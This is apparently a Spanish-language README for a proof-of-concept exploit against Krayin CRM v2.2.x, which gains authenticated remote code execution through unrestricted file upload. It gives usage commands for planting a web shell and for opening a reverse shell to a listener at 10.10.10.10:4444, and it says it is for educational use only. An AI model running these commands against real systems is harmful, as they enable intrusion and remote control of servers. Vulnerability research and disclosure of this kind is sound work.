
Exploit de prueba de concepto para ejecución remota de código autenticada en Krayin CRM v2.2.x mediante carga de archivos sin restricciones, compatible con payloads de web shell y reverse shell.
Script PoC para vulnerabilidad crítica en Krayin CRM v2.2.x que permite RCE autenticado mediante carga de archivos sin restricciones.
# Web shell
python3 exploit.py -u http://target.com -e [email protected] -p password123
# Reverse shell
python3 exploit.py -u http://target.com -e [email protected] -p password123 -l 10.10.10.10 -P 4444
Solo con fines educativos.